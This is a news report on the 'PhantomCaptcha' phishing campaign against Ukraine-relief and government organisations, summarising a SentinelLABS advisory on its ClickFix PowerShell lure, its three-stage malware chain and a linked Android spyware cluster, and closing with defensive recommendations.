A coordinated phishing campaign aimed at humanitarian and government organizations supporting Ukraine’s war relief efforts has been uncovered by cybersecurity researchers.
The operation, known as “PhantomCaptcha,” impersonated the Ukrainian President’s Office to trick victims into downloading malware through a malicious PDF document.
According to a new advisory by SentinelLABS and the Digital Security Lab of Ukraine published today, the attack began on October 8 2025, when targeted employees from the International Red Cross, UNICEF, the Norwegian Refugee Council and several Ukrainian regional administrations received phishing emails.
These messages contained an eight-page PDF masquerading as an official government memo. Once opened, the document directed users to a fake Zoom site, zoomconference[.]app, which hosted malicious scripts on infrastructure owned by a Russian provider.
Victims were presented with what appeared to be a Cloudflare verification page. The page prompted them to perform several actions that ultimately executed a PowerShell command, allowing attackers to install malware onto their systems.
This technique, known as “ClickFix” or “Paste and Run,” relies on users unknowingly running commands themselves, bypassing standard security checks.
The malware operated in three separate stages:
-
Stage 1: A heavily obfuscated downloader script exceeding 500KB that retrieved additional payloads
-
Stage 2: A reconnaissance module gathering system identifiers, usernames and domain information
-
Stage 3: A WebSocket-based remote access Trojan (RAT) enabling command execution and data exfiltration
Researchers noted the infrastructure was active for just one day, reflecting a deliberate strategy to evade detection. However, backend servers remained online to manage infected devices.
Further analysis linked PhantomCaptcha to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.
One such domain, princess-mens[.]click, distributed an app called princess.apk, which collected contacts, media, SIM data and location details from infected devices. Although connected, this mobile vector is being tracked as a separate activity cluster.
“The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,” SentinelLABS said.
“The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.”
To defend against this threat, the company advised users to remain cautious of instructions requiring them to paste commands into Windows Run dialogs.
Organizations should also monitor PowerShell activity, enforce execution policy restrictions and track suspicious WebSocket connections, particularly those associated with newly registered or impersonated domains.
Image credit: rospoint / Shutterstock.com
